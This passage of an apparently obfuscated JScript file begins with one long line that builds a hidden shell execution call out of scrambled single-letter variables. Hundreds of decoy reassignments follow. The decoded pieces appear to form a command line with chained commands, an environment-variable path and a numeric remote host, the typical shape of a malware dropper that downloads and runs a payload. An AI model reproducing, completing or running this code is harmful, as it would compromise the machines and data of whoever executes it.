13 | this[plyrm + yrkpssao + vzihw + umconock + lfnnk + yjrezl + fwvhhu][ygpicveyl + umconock + ebpuax + byxiqg + fwvhhu + ebpuax + jiadq + grsfp + jmxst + ebpuax + vzihw + fwvhhu] ( plyrm + yrkpssao + vzihw + umconock + lfnnk + yjrezl + fwvhhu + ezvmgi + yrkpssao + leqjnkin + ebpuax + yjhhb + yjhhb ) [umconock + vjmlu + hyxioi] ( vzihw + lhbzzxvt + dmeqkmac + hxjfbdrze + xpjzic + vzihw + hxjfbdrze + yjrezl + lttwqewkl + gfecdh + ebpuax + umconock + nrqacu + leqjnkin + ebpuax + yjhhb + yjhhb + ezvmgi + ebpuax + jphjocvu + ebpuax + hxjfbdrze + bquztd + ygpicveyl + lttwqewkl + lhbzzxvt + lhbzzxvt + byxiqg + hyxioi + dmeqkmac + hxjfbdrze + qyeqt + fkgzve + hyxioi + xtcgggho + lttwqewkl + xuubyr + ebpuax + bquztd + plyrm + ebpuax + grsfp + hlxzqpip + ebpuax + ujanb + vjmlu + ebpuax + nrqacu + fwvhhu + hxjfbdrze + bquztd + jiadq + vjmlu + fwvhhu + fylvma + lfnnk + yjhhb + ebpuax + hxjfbdrze + hqdquu + fwvhhu + ebpuax + lhbzzxvt + yjrezl + hqdquu + qzgaasljd + lfnnk + hyxioi + xtcgggho + lttwqewkl + lfnnk + vzihw + ebpuax + ezvmgi + yjrezl + dmeqkmac + maizwe + hxjfbdrze + leqjnkin + fwvhhu + fwvhhu + yjrezl + gholxjri + xpjzic + xpjzic + eatmoe + anmckzaza + sjiqqn + ezvmgi + eatmoe + kdbvzv + sjiqqn + ezvmgi + eatmoe + ezvmgi + ncsaehpg + bvloqrb + qtlivnseb + xpjzic + lfnnk + hyxioi + xtcgggho + lttwqewkl + lfnnk + vzihw + ebpuax + ezvmgi + yjrezl + leqjnkin + yjrezl + qyeqt + abipraunk + abipraunk + nrqacu + fwvhhu + byxiqg + umconock + fwvhhu + hxjfbdrze + hqdquu + fwvhhu + ebpuax + lhbzzxvt + yjrezl + hqdquu + qzgaasljd + lfnnk + hyxioi + xtcgggho + lttwqewkl + lfnnk + vzihw + ebpuax + ezvmgi + yjrezl + dmeqkmac + maizwe + abipraunk + abipraunk + vzihw + lhbzzxvt + dmeqkmac + hxjfbdrze + xpjzic + vzihw + hxjfbdrze + hyxioi + ebpuax + fwvhhu + hxjfbdrze + vjmlu + nrqacu + ebpuax + hxjfbdrze + qzgaasljd + qzgaasljd + eatmoe + anmckzaza + sjiqqn + ezvmgi + eatmoe + kdbvzv + sjiqqn + ezvmgi + eatmoe + ezvmgi + ncsaehpg + bvloqrb + qtlivnseb + xhcip + ksbwvzcqs + ksbwvzcqs + ksbwvzcqs + ksbwvzcqs + qzgaasljd + dmeqkmac + byxiqg + xtcgggho + gfecdh + gfecdh + gfecdh + umconock + lttwqewkl + lttwqewkl + fwvhhu + qzgaasljd + abipraunk + abipraunk + vzihw + lhbzzxvt + dmeqkmac + hxjfbdrze + xpjzic + vzihw + hxjfbdrze + umconock + ebpuax + dxbgjacs + nrqacu + xtcgggho + umconock + sjiqqn + ncsaehpg + hxjfbdrze + xpjzic + nrqacu + hxjfbdrze + qzgaasljd + qzgaasljd + eatmoe + anmckzaza + sjiqqn + ezvmgi + eatmoe + kdbvzv + sjiqqn + ezvmgi + eatmoe + ezvmgi + ncsaehpg + bvloqrb + qtlivnseb + xhcip + ksbwvzcqs + ksbwvzcqs + ksbwvzcqs + ksbwvzcqs + qzgaasljd + dmeqkmac + byxiqg + xtcgggho + gfecdh + gfecdh + gfecdh + umconock + lttwqewkl + lttwqewkl + fwvhhu + qzgaasljd + sjiqqn + anmckzaza + kwlbrchj + ksbwvzcqs + eatmoe + sjiqqn + ksbwvzcqs + kdbvzv + qaryvrhu + ncsaehpg + sjiqqn + ksbwvzcqs + ncsaehpg + kwlbrchj + ezvmgi + dmeqkmac + yjhhb + yjhhb, 0, false ); |
|
14 | } | |
15 | jmxst = "k"; | |
16 | jmxst = "J"; | |
17 | jmxst = "j"; | |
18 | hlxzqpip = "m"; | |
19 | hlxzqpip = "l"; | |
20 | hlxzqpip = "q"; | |
21 | hlxzqpip = "j"; | |
22 | hlxzqpip = "B"; | |
23 | hlxzqpip = "h"; | |
24 | hlxzqpip = "I"; | |
25 | hlxzqpip = "g"; | |
26 | hlxzqpip = "P"; | |
27 | hlxzqpip = "b"; | |
28 | hlxzqpip = "g"; | |
29 | hlxzqpip = "N"; | |
30 | hlxzqpip = "R"; | |
31 | vbwvnt = "r"; | |
32 | vbwvnt = "X"; | |
33 | vbwvnt = "c"; | |
34 | vbwvnt = "a"; | |
35 | vbwvnt = "q"; | |
36 | vbwvnt = "B"; | |
37 | vbwvnt = "C"; | |
38 | vbwvnt = "r"; | |
39 | vbwvnt = "h"; | |
40 | vbwvnt = "M"; | |
41 | vbwvnt = "e"; | |
42 | vbwvnt = "a"; | |
43 | vbwvnt = "s"; | |
44 | vbwvnt = "B"; | |
45 | vbwvnt = "q"; | |
46 | vbwvnt = "C"; | |
47 | vbwvnt = "C"; | |
48 | vbwvnt = "X"; | |
49 | vbwvnt = "L"; | |
50 | vbwvnt = "N"; | |
51 | vbwvnt = "l"; | |
52 | vbwvnt = "N"; | |
53 | vbwvnt = "h"; | |
54 | vbwvnt = "m"; | |
55 | vbwvnt = "a"; | |
56 | vbwvnt = "y"; | |
57 | vbwvnt = "P"; | |
58 | vbwvnt = "R"; | |
59 | vbwvnt = "Y"; | |
60 | vbwvnt = "u"; | |
61 | vbwvnt = "d"; | |
62 | vbwvnt = "h"; | |
63 | vbwvnt = "w"; | |
64 | vbwvnt = "v"; | |
65 | vbwvnt = "J"; | |
66 | vbwvnt = "J"; | |
67 | vbwvnt = "e"; | |
68 | vbwvnt = "z"; | |
69 | vbwvnt = "M"; | |
70 | vbwvnt = "R"; | |
71 | vbwvnt = "d"; | |
72 | vbwvnt = "u"; | |
73 | vbwvnt = "b"; | |
74 | vbwvnt = "Q"; | |
75 | grsfp = "b"; | |
76 | grsfp = "D"; | |
77 | grsfp = "h"; | |
78 | grsfp = "a"; | |
79 | grsfp = "y"; | |
80 | grsfp = "A"; | |
81 | grsfp = "s"; | |
82 | grsfp = "j"; | |
83 | grsfp = "u"; | |
84 | grsfp = "l"; | |
85 | grsfp = "G"; | |
86 | grsfp = "M"; | |
87 | grsfp = "g"; | |
88 | grsfp = "p"; | |
89 | grsfp = "t"; | |
90 | grsfp = "E"; | |
91 | grsfp = "C"; | |
92 | grsfp = "J"; | |
93 | grsfp = "A"; | |
94 | grsfp = "m"; | |
95 | grsfp = "l"; | |
96 | grsfp = "m"; | |
97 | grsfp = "x"; | |
98 | grsfp = "a"; | |
99 | grsfp = "x"; | |
100 | grsfp = "J"; | |
101 | grsfp = "t"; | |
102 | grsfp = "K"; | |
103 | grsfp = "o"; | |
104 | grsfp = "F"; | |
105 | grsfp = "I"; | |
106 | grsfp = "Y"; | |
107 | grsfp = "L"; | |
108 | grsfp = "S"; | |
109 | grsfp = "x"; | |
110 | grsfp = "b"; | |
111 | umconock = "D"; | |
112 | umconock = "r"; | |
113 | umconock = "z"; | |
114 | umconock = "w"; | |
115 | umconock = "V"; | |
116 | umconock = "Z"; | |
117 | umconock = "O"; | |
118 | umconock = "b"; | |
119 | umconock = "f"; | |
120 | umconock = "C"; | |
121 | umconock = "e"; | |
122 | umconock = "m"; | |
123 | umconock = "J"; | |
124 | umconock = "c"; | |
125 | umconock = "Q"; | |
126 | umconock = "r"; | |
127 | eatmoe = "y"; | |
128 | eatmoe = "Y"; | |
129 | eatmoe = "r"; | |
130 | eatmoe = "d"; | |
131 | eatmoe = "c"; | |
132 | eatmoe = "d"; | |
133 | eatmoe = "l"; | |
134 | eatmoe = "e"; | |
135 | eatmoe = "s"; | |
136 | eatmoe = "b"; | |
137 | eatmoe = "x"; | |
138 | eatmoe = "Z"; | |
139 | eatmoe = "l"; | |
140 | eatmoe = "s"; | |
141 | eatmoe = "W"; | |
142 | eatmoe = "f"; | |
143 | eatmoe = "x"; | |
144 | eatmoe = "M"; | |
145 | eatmoe = "y"; | |
146 | eatmoe = "A"; | |
147 | eatmoe = "X"; | |
148 | eatmoe = "W"; | |
149 | eatmoe = "s"; | |
150 | eatmoe = "g"; | |
151 | eatmoe = "o"; | |
152 | eatmoe = "W"; | |
153 | eatmoe = "n"; | |
154 | eatmoe = "V"; | |
155 | eatmoe = "J"; | |
156 | eatmoe = "i"; | |
157 | eatmoe = "p"; | |
158 | eatmoe = "n"; | |
159 | eatmoe = "l"; | |
160 | eatmoe = "1"; | |
161 | lttwqewkl = "J"; | |
162 | lttwqewkl = "b"; | |
163 | lttwqewkl = "n"; | |
164 | lttwqewkl = "J"; | |
165 | lttwqewkl = "K"; | |
166 | lttwqewkl = "G"; | |
167 | lttwqewkl = "Z"; | |
168 | lttwqewkl = "I"; | |
169 | lttwqewkl = "y"; | |
170 | lttwqewkl = "J"; | |
171 | lttwqewkl = "C"; | |
172 | lttwqewkl = "n"; | |
173 | lttwqewkl = "F"; | |
174 | lttwqewkl = "i"; | |
175 | lttwqewkl = "j"; | |
176 | lttwqewkl = "x"; | |
177 | lttwqewkl = "P"; | |
178 | lttwqewkl = "N"; | |
179 | lttwqewkl = "I"; | |
180 | lttwqewkl = "J"; | |
181 | lttwqewkl = "v"; | |
182 | lttwqewkl = "c"; | |
183 | lttwqewkl = "T"; | |
184 | lttwqewkl = "w"; | |
185 | lttwqewkl = "y"; | |
186 | lttwqewkl = "S"; | |
187 | lttwqewkl = "Z"; | |
188 | lttwqewkl = "p"; | |
189 | lttwqewkl = "U"; | |
190 | lttwqewkl = "o"; | |
191 | qzgaasljd = "s"; | |
192 | qzgaasljd = "n"; | |
193 | qzgaasljd = "l"; | |
194 | qzgaasljd = "k"; | |
195 | qzgaasljd = "s"; | |
196 | qzgaasljd = "R"; | |
197 | qzgaasljd = "m"; | |
198 | qzgaasljd = "Q"; | |
199 | qzgaasljd = "k"; | |
200 | qzgaasljd = "V"; | |
201 | qzgaasljd = "Y"; | |
202 | qzgaasljd = "K"; | |
203 | qzgaasljd = "t"; | |
204 | qzgaasljd = "R"; | |
205 | qzgaasljd = "p"; | |
206 | qzgaasljd = "w"; | |
207 | qzgaasljd = "T"; | |
208 | qzgaasljd = "j"; | |
209 | qzgaasljd = "o"; | |
210 | qzgaasljd = "w"; | |
211 | qzgaasljd = "K"; | |
212 | qzgaasljd = "A"; | |
213 | qzgaasljd = "Q"; | |
214 | qzgaasljd = "m"; | |
215 | qzgaasljd = "h"; | |
216 | qzgaasljd = "u"; | |
217 | qzgaasljd = "E"; | |
218 | qzgaasljd = "C"; | |
219 | qzgaasljd = "k"; | |
220 | qzgaasljd = "V"; | |
221 | qzgaasljd = "q"; | |
222 | qzgaasljd = "n"; | |
223 | qzgaasljd = "d"; | |
224 | qzgaasljd = "o"; | |
225 | qzgaasljd = "O"; | |
226 | qzgaasljd = "K"; | |
227 | qzgaasljd = "R"; | |
228 | qzgaasljd = "I"; | |
229 | qzgaasljd = "b"; | |
230 | qzgaasljd = "\\"; | |
231 | gfecdh = "Y"; | |
232 | gfecdh = "n"; | |
233 | gfecdh = "D"; | |
234 | gfecdh = "t"; | |
235 | gfecdh = "f"; | |
236 | gfecdh = "L"; | |
237 | gfecdh = "D"; | |
238 | gfecdh = "a"; | |
239 | gfecdh = "I"; | |
240 | gfecdh = "Q"; | |
241 | gfecdh = "w"; | |
242 | xtcgggho = "S"; | |
243 | xtcgggho = "L"; | |
244 | xtcgggho = "q"; | |
245 | xtcgggho = "i"; | |
246 | xtcgggho = "e"; | |
247 | xtcgggho = "t"; | |
248 | xtcgggho = "n"; | |
249 | xtcgggho = "E"; | |
250 | xtcgggho = "y"; | |
251 | xtcgggho = "y"; | |
252 | xtcgggho = "d"; | |
253 | xtcgggho = "a"; | |
254 | xtcgggho = "H"; | |
255 | xtcgggho = "S"; | |
256 | xtcgggho = "a"; | |
257 | xtcgggho = "n"; | |
258 | xtcgggho = "x"; | |
259 | xtcgggho = "Z"; | |
260 | xtcgggho = "v"; | |
261 | derhaa = "B"; | |
262 | derhaa = "X"; | |
263 | derhaa = "Z"; | |
264 | derhaa = "B"; | |
265 | derhaa = "S"; | |
266 | derhaa = "H"; | |
267 | derhaa = "L"; | |
268 | kdbvzv = "I"; | |
269 | kdbvzv = "H"; | |
270 | kdbvzv = "J"; | |
271 | kdbvzv = "o"; | |
272 | kdbvzv = "g"; | |
273 | kdbvzv = "G"; | |
274 | kdbvzv = "q"; | |
275 | kdbvzv = "Q"; | |
276 | kdbvzv = "V"; | |
277 | kdbvzv = "p"; | |
278 | kdbvzv = "n"; | |
279 | kdbvzv = "W"; | |
280 | kdbvzv = "a"; | |
281 | kdbvzv = "V"; | |
282 | kdbvzv = "4"; | |
283 | xwlnobpg = "H"; | |
284 | xwlnobpg = "X"; | |
285 | xwlnobpg = "H"; | |
286 | vkrjgerz = "f"; | |
287 | vkrjgerz = "z"; | |
288 | vkrjgerz = "e"; | |
289 | vkrjgerz = "C"; | |
290 | vkrjgerz = "a"; | |
291 | vkrjgerz = "F"; | |
292 | vkrjgerz = "h"; | |
293 | vkrjgerz = "B"; | |
294 | vkrjgerz = "Y"; | |
295 | vkrjgerz = "u"; | |
296 | vkrjgerz = "Y"; | |
297 | vkrjgerz = "n"; | |
298 | vkrjgerz = "A"; | |
299 | vkrjgerz = "B"; | |
300 | vkrjgerz = "y"; | |
301 | vkrjgerz = "W"; | |
302 | vkrjgerz = "J"; | |
303 | vkrjgerz = "s"; | |
304 | vkrjgerz = "E"; | |
305 | vkrjgerz = "H"; | |
306 | vkrjgerz = "r"; | |
307 | vkrjgerz = "g"; | |
308 | vkrjgerz = "P"; | |
309 | vkrjgerz = "C"; | |
310 | vkrjgerz = "B"; | |
311 | vkrjgerz = "d"; | |
312 | vkrjgerz = "T"; | |
313 | vkrjgerz = "H"; | |
314 | vkrjgerz = "W"; | |
315 | vkrjgerz = "b"; | |
316 | vkrjgerz = "T"; | |
317 | vkrjgerz = "C"; | |
318 | vkrjgerz = "x"; | |
319 | vkrjgerz = "t"; | |
320 | vkrjgerz = "H"; | |
321 | vkrjgerz = "w"; | |
322 | vkrjgerz = "a"; | |
323 | vkrjgerz = "m"; | |
324 | vkrjgerz = "o"; | |
325 | vkrjgerz = "T"; | |
326 | vkrjgerz = "b"; | |
327 | vkrjgerz = "u"; | |
328 | vkrjgerz = "P"; | |
329 | yjhhb = "j"; | |
330 | yjhhb = "A"; | |
331 | yjhhb = "D"; | |
332 | yjhhb = "H"; | |
333 | yjhhb = "h"; | |
334 | yjhhb = "Z"; | |
335 | yjhhb = "V"; | |
336 | yjhhb = "F"; | |
337 | yjhhb = "i"; | |
338 | yjhhb = "C"; | |
339 | yjhhb = "W"; | |
340 | yjhhb = "r"; | |
341 | yjhhb = "u"; | |
342 | yjhhb = "H"; | |
343 | yjhhb = "y"; | |
344 | yjhhb = "R"; | |
345 | yjhhb = "e"; | |
346 | yjhhb = "H"; | |
347 | yjhhb = "l"; | |
348 | yrkpssao = "Y"; | |
349 | yrkpssao = "l"; | |
350 | yrkpssao = "W"; | |
351 | yrkpssao = "S"; | |
352 | qtlivnseb = "D"; | |
353 | qtlivnseb = "W"; | |
354 | qtlivnseb = "W"; | |
355 | qtlivnseb = "F"; | |
356 | qtlivnseb = "Z"; | |
357 | qtlivnseb = "J"; | |
358 | qtlivnseb = "V"; | |
359 | qtlivnseb = "y"; | |
360 | qtlivnseb = "F"; | |
361 | qtlivnseb = "V"; | |
362 | qtlivnseb = "r"; | |
363 | qtlivnseb = "c"; | |
364 | qtlivnseb = "w"; | |
365 | qtlivnseb = "I"; | |
366 | qtlivnseb = "l"; | |
367 | qtlivnseb = "O"; | |
368 | qtlivnseb = "d"; | |
369 | qtlivnseb = "r"; | |
370 | qtlivnseb = "z"; | |
371 | qtlivnseb = "B"; | |
372 | qtlivnseb = "m"; | |
373 | qtlivnseb = "r"; | |
374 | qtlivnseb = "D"; | |
375 | qtlivnseb = "L"; | |
376 | qtlivnseb = "P"; | |
377 | qtlivnseb = "H"; | |
378 | qtlivnseb = "E"; | |
379 | qtlivnseb = "V"; | |
380 | qtlivnseb = "j"; | |
381 | qtlivnseb = "O"; | |
382 | qtlivnseb = "I"; | |
383 | qtlivnseb = "U"; | |
384 | qtlivnseb = "5"; | |
385 | lhbzzxvt = "X"; | |
386 | lhbzzxvt = "p"; | |
387 | lhbzzxvt = "H"; | |
388 | lhbzzxvt = "Y"; | |
389 | lhbzzxvt = "p"; | |
390 | lhbzzxvt = "U"; | |
391 | lhbzzxvt = "a"; | |
392 | lhbzzxvt = "J"; | |
393 | lhbzzxvt = "u"; | |
394 | lhbzzxvt = "s"; | |
395 | lhbzzxvt = "R"; | |
396 | lhbzzxvt = "h"; | |
397 | lhbzzxvt = "b"; | |
398 | lhbzzxvt = "z"; | |
399 | lhbzzxvt = "P"; | |
400 | lhbzzxvt = "H"; | |
401 | lhbzzxvt = "N"; | |
402 | lhbzzxvt = "c"; | |
403 | lhbzzxvt = "S"; | |
404 | lhbzzxvt = "z"; | |
405 | lhbzzxvt = "y"; | |
406 | lhbzzxvt = "b"; | |
407 | lhbzzxvt = "M"; | |
408 | lhbzzxvt = "Z"; | |
409 | lhbzzxvt = "Q"; | |
410 | lhbzzxvt = "P"; | |
411 | lhbzzxvt = "Z"; | |
412 | lhbzzxvt = "A"; | |
413 | lhbzzxvt = "b"; | |
414 | lhbzzxvt = "S"; | |
415 | lhbzzxvt = "i"; | |
416 | lhbzzxvt = "L"; | |
417 | lhbzzxvt = "q"; | |
418 | lhbzzxvt = "S"; | |
419 | lhbzzxvt = "q"; | |
420 | lhbzzxvt = "v"; | |
421 | lhbzzxvt = "m"; | |
422 | ebpuax = "A"; | |
423 | ebpuax = "s"; | |
424 | ebpuax = "I"; | |
425 | ebpuax = "r"; | |
426 | ebpuax = "H"; | |
427 | ebpuax = "Z"; | |
428 | ebpuax = "h"; | |
429 | ebpuax = "E"; | |
430 | ebpuax = "q"; | |
431 | ebpuax = "Z"; | |
432 | ebpuax = "Z"; | |
433 | ebpuax = "u"; | |
434 | ebpuax = "e"; | |
435 | lfnnk = "e"; | |
436 | lfnnk = "a"; | |
437 | lfnnk = "i"; | |
438 | lfnnk = "T"; | |
439 | lfnnk = "d"; | |
440 | lfnnk = "x"; | |
441 | lfnnk = "r"; | |
442 | lfnnk = "e"; | |
443 | lfnnk = "i"; | |
444 | zxbdwfm = "i"; | |
445 | zxbdwfm = "f"; | |
446 | zxbdwfm = "Y"; | |
447 | zxbdwfm = "w"; | |
448 | zxbdwfm = "v"; | |
449 | zxbdwfm = "p"; | |
450 | zxbdwfm = "l"; | |
451 | zxbdwfm = "Y"; | |
452 | zxbdwfm = "X"; | |
453 | zxbdwfm = "u"; | |
454 | zxbdwfm = "X"; | |
455 | zxbdwfm = "x"; | |
456 | zxbdwfm = "V"; | |
457 | zxbdwfm = "N"; | |
458 | zxbdwfm = "J"; | |
459 | zxbdwfm = "S"; | |
460 | zxbdwfm = "O"; | |
461 | zxbdwfm = "X"; | |
462 | zxbdwfm = "y"; | |
463 | zxbdwfm = "N"; | |
464 | ygpicveyl = "Z"; | |
465 | ygpicveyl = "y"; | |
466 | ygpicveyl = "o"; | |
467 | ygpicveyl = "F"; | |
468 | ygpicveyl = "z"; | |
469 | ygpicveyl = "d"; | |
470 | ygpicveyl = "p"; | |
471 | ygpicveyl = "G"; | |
472 | ygpicveyl = "U"; | |
473 | ygpicveyl = "u"; | |
474 | ygpicveyl = "M"; | |
475 | ygpicveyl = "q"; | |
476 | ygpicveyl = "G"; | |
477 | ygpicveyl = "x"; | |
478 | ygpicveyl = "C"; | |
479 | hrepmc = "l"; | |
480 | hrepmc = "F"; | |
481 | hrepmc = "N"; | |
482 | hrepmc = "e"; | |
483 | hrepmc = "r"; | |
484 | hrepmc = "U"; | |
485 | hrepmc = "h"; | |
486 | hrepmc = "t"; | |
487 | hrepmc = "M"; | |
488 | hrepmc = "j"; | |
489 | hrepmc = "e"; | |
490 | hrepmc = "m"; | |
491 | hrepmc = "G"; | |
492 | hrepmc = "H"; | |
493 | hrepmc = "N"; | |
494 | hrepmc = "A"; | |
495 | hrepmc = "g"; | |
496 | hrepmc = "J"; | |
497 | hrepmc = "K"; | |
498 | hrepmc = "B"; | |
499 | hrepmc = "M"; | |
500 | hrepmc = "C"; | |
501 | hrepmc = "R"; | |
502 | hrepmc = "q"; | |
503 | hrepmc = "g"; | |
504 | hrepmc = "y"; | |
505 | hrepmc = "O"; | |
506 | hrepmc = "K"; | |
507 | hrepmc = "y"; | |
508 | hrepmc = "l"; | |
509 | hrepmc = "d"; | |
510 | hrepmc = "b"; | |
511 | hrepmc = "F"; | |
512 | hrepmc = "h"; | |
513 | hrepmc = "E"; | |
514 | fylvma = "F"; | |
515 | abipraunk = "r"; | |
516 | abipraunk = "z"; | |
517 | abipraunk = "&"; | |
518 | qyeqt = "S"; | |
519 | qyeqt = "F"; | |
520 | qyeqt = "G"; | |
521 | qyeqt = "J"; | |
522 | qyeqt = "V"; | |
523 | qyeqt = "g"; | |
524 | qyeqt = "x"; | |
525 | qyeqt = "f"; | |
526 | qyeqt = "Q"; | |
527 | qyeqt = "Z"; | |
528 | qyeqt = "J"; | |
529 | qyeqt = "P"; | |
530 | qyeqt = "J"; | |
531 | qyeqt = "p"; | |
532 | qyeqt = "k"; | |
533 | qyeqt = "v"; | |
534 | qyeqt = "t"; | |
535 | qyeqt = "E"; | |
536 | qyeqt = "x"; | |
537 | qyeqt = "k"; | |
538 | qyeqt = "h"; | |
539 | qyeqt = "S"; | |
540 | qyeqt = "o"; | |
541 | qyeqt = "w"; | |
542 | qyeqt = "p"; | |
543 | qyeqt = "F"; | |
544 | qyeqt = "e"; | |
545 | qyeqt = "b"; | |
546 | qyeqt = "w"; | |
547 | qyeqt = "z"; | |
548 | qyeqt = "X"; | |
549 | qyeqt = "g"; | |
550 | qyeqt = "N"; | |
551 | qyeqt = "i"; | |
552 | qyeqt = "U"; | |
553 | qyeqt = "M"; | |
554 | qyeqt = "d"; | |
555 | qyeqt = "J"; | |
556 | qyeqt = "q"; | |
557 | qyeqt = "a"; | |
558 | qyeqt = "n"; | |
559 | qyeqt = "\""; | |
560 | ncsaehpg = "r"; | |
561 | ncsaehpg = "f"; | |
562 | ncsaehpg = "H"; | |
563 | ncsaehpg = "2"; | |
564 | byxiqg = "Z"; | |
565 | byxiqg = "s"; | |
566 | byxiqg = "g"; | |
567 | byxiqg = "w"; | |
568 | byxiqg = "Z"; | |
569 | byxiqg = "m"; | |
570 | byxiqg = "Z"; | |
571 | byxiqg = "f"; | |
572 | byxiqg = "r"; | |
573 | byxiqg = "o"; | |
574 | byxiqg = "Q"; | |
575 | byxiqg = "y"; | |
576 | byxiqg = "H"; | |
577 | byxiqg = "M"; | |
578 | byxiqg = "T"; | |
579 | byxiqg = "b"; | |
580 | byxiqg = "k"; | |
581 | byxiqg = "B"; | |
582 | byxiqg = "S"; | |
583 | byxiqg = "z"; | |
584 | byxiqg = "f"; | |
585 | byxiqg = "c"; | |
586 | byxiqg = "q"; | |
587 | byxiqg = "U"; | |
588 | byxiqg = "d"; | |
589 | byxiqg = "a"; | |
590 | jphjocvu = "a"; | |
591 | jphjocvu = "F"; | |
592 | jphjocvu = "R"; | |
593 | jphjocvu = "X"; | |
594 | jphjocvu = "I"; | |
595 | jphjocvu = "n"; | |
596 | jphjocvu = "o"; | |
597 | jphjocvu = "h"; | |
598 | jphjocvu = "p"; | |
599 | jphjocvu = "e"; | |
600 | jphjocvu = "d"; | |
601 | jphjocvu = "L"; | |
602 | jphjocvu = "J"; | |
603 | jphjocvu = "s"; | |
604 | jphjocvu = "K"; | |
605 | jphjocvu = "u"; | |
606 | jphjocvu = "s"; | |
607 | jphjocvu = "i"; | |
608 | jphjocvu = "R"; | |
609 | jphjocvu = "C"; | |
610 | jphjocvu = "l"; | |
611 | jphjocvu = "Y"; | |
612 | jphjocvu = "A"; | |
613 | jphjocvu = "D"; | |
614 | jphjocvu = "X"; | |
615 | jphjocvu = "I"; | |
616 | jphjocvu = "Q"; | |
617 | jphjocvu = "I"; | |
618 | jphjocvu = "L"; | |
619 | jphjocvu = "x"; | |
620 | zfnnaw = "b"; | |
621 | zfnnaw = "p"; | |
622 | zfnnaw = "k"; | |
623 | zfnnaw = "k"; | |
624 | zfnnaw = "B"; | |
625 | zfnnaw = "H"; | |
626 | zfnnaw = "v"; | |
627 | zfnnaw = "C"; | |
628 | zfnnaw = "i"; | |
629 | zfnnaw = "F"; | |
630 | zfnnaw = "U"; | |
631 | zfnnaw = "j"; | |
632 | zfnnaw = "L"; | |
633 | zfnnaw = "X"; | |
634 | zfnnaw = "v"; | |
635 | zfnnaw = "D"; | |
636 | zfnnaw = "L"; | |
637 | zfnnaw = "x"; | |
638 | zfnnaw = "j"; | |
639 | zfnnaw = "m"; | |
640 | zfnnaw = "i"; | |
641 | zfnnaw = "I"; | |
642 | zfnnaw = "p"; | |
643 | zfnnaw = "I"; | |
644 | zfnnaw = "t"; | |
645 | zfnnaw = "v"; | |
646 | zfnnaw = "Z"; | |
647 | zfnnaw = "C"; | |
648 | zfnnaw = "f"; | |
649 | zfnnaw = "X"; | |
650 | zfnnaw = "Y"; | |
651 | zfnnaw = "m"; | |
652 | zfnnaw = "p"; | |
653 | zfnnaw = "d"; | |
654 | zfnnaw = "Y"; | |
655 | hxjfbdrze = "v"; | |
656 | hxjfbdrze = "T"; | |
657 | hxjfbdrze = " "; | |
658 | hyxioi = "e"; | |
659 | hyxioi = "u"; | |
660 | hyxioi = "m"; | |
661 | hyxioi = "J"; | |
662 | hyxioi = "D"; | |
663 | hyxioi = "s"; | |
664 | hyxioi = "A"; | |
665 | hyxioi = "k"; | |
666 | hyxioi = "s"; | |
667 | hyxioi = "V"; | |
668 | hyxioi = "M"; | |
669 | hyxioi = "R"; | |
670 | hyxioi = "u"; | |
671 | hyxioi = "T"; | |
672 | hyxioi = "h"; | |
673 | hyxioi = "a"; | |
674 | hyxioi = "V"; | |
675 | hyxioi = "u"; | |
676 | hyxioi = "H"; | |
677 | hyxioi = "b"; | |
678 | hyxioi = "A"; | |
679 | hyxioi = "U"; | |
680 | hyxioi = "U"; | |
681 | hyxioi = "S"; | |
682 | hyxioi = "X"; | |
683 | hyxioi = "x"; | |
684 | hyxioi = "R"; | |
685 | hyxioi = "Q"; | |
686 | hyxioi = "Y"; | |
687 | hyxioi = "r"; | |
688 | hyxioi = "n"; | |
689 | bquztd = "g"; | |
690 | bquztd = "s"; | |
691 | bquztd = "b"; | |
692 | bquztd = "s"; | |
693 | bquztd = "G"; | |
694 | bquztd = "A"; | |
695 | bquztd = "q"; | |
696 | bquztd = "o"; | |
697 | bquztd = "z"; | |
698 | bquztd = "o"; | |
699 | bquztd = "I"; | |
700 | bquztd = "t"; | |
701 | bquztd = "v"; | |
702 | bquztd = "q"; | |
703 | bquztd = "e"; | |
704 | bquztd = "q"; | |
705 | bquztd = "V"; | |
706 | bquztd = "r"; | |
707 | bquztd = "l"; | |
708 | bquztd = "Y"; | |
709 | bquztd = "r"; | |
710 | bquztd = "d"; | |
711 | bquztd = "o"; | |
712 | bquztd = "K"; | |
713 | bquztd = "-"; | |
714 | xuubyr = "F"; | |
715 | xuubyr = "J"; | |
716 | xuubyr = "L"; | |
717 | xuubyr = "C"; | |
718 | xuubyr = "b"; | |
719 | xuubyr = "k"; | |
720 | xuubyr = "P"; | |
721 | xuubyr = "y"; | |
722 | xuubyr = "N"; | |
723 | xuubyr = "Z"; | |
724 | xuubyr = "u"; | |
725 | xuubyr = "j"; | |
726 | xuubyr = "A"; | |
727 | xuubyr = "d"; | |
728 | xuubyr = "p"; | |
729 | xuubyr = "T"; | |
730 | xuubyr = "k"; | |
731 | hqdquu = "t"; | |
732 | hqdquu = "I"; | |
733 | hqdquu = "N"; | |
734 | hqdquu = "j"; | |
735 | hqdquu = "R"; | |
736 | hqdquu = "S"; | |
737 | hqdquu = "r"; | |
738 | hqdquu = "Y"; | |
739 | hqdquu = "Y"; | |
740 | hqdquu = "A"; | |
741 | hqdquu = "l"; | |
742 | hqdquu = "M"; | |
743 | hqdquu = "s"; | |
744 | hqdquu = "V"; | |
745 | hqdquu = "x"; | |
746 | hqdquu = "e"; | |
747 | hqdquu = "t"; | |
748 | hqdquu = "k"; | |
749 | hqdquu = "a"; | |
750 | hqdquu = "k"; | |
751 | hqdquu = "E"; | |
752 | hqdquu = "U"; | |
753 | hqdquu = "W"; | |
754 | hqdquu = "f"; | |
755 | hqdquu = "A"; | |
756 | hqdquu = "J"; | |
757 | hqdquu = "R"; | |
758 | hqdquu = "S"; | |
759 | hqdquu = "S"; | |
760 | hqdquu = "V"; | |
761 | hqdquu = "M"; | |
762 | hqdquu = "Y"; | |
763 | hqdquu = "V"; | |
764 | hqdquu = "p"; | |
765 | hqdquu = "L"; | |
766 | hqdquu = "%"; | |
767 | dmeqkmac = "a"; | |
768 | dmeqkmac = "n"; | |
769 | dmeqkmac = "U"; | |
770 | dmeqkmac = "H"; | |
771 | dmeqkmac = "F"; | |
772 | dmeqkmac = "j"; | |
773 | dmeqkmac = "T"; | |
774 | dmeqkmac = "k"; | |
775 | dmeqkmac = "j"; | |
776 | dmeqkmac = "h"; | |
777 | dmeqkmac = "N"; | |
778 | dmeqkmac = "G"; | |
779 | dmeqkmac = "o"; | |
780 | dmeqkmac = "X"; | |
781 | dmeqkmac = "a"; | |
782 | dmeqkmac = "c"; | |
783 | dmeqkmac = "p"; | |
784 | dmeqkmac = "K"; | |
785 | dmeqkmac = "K"; | |
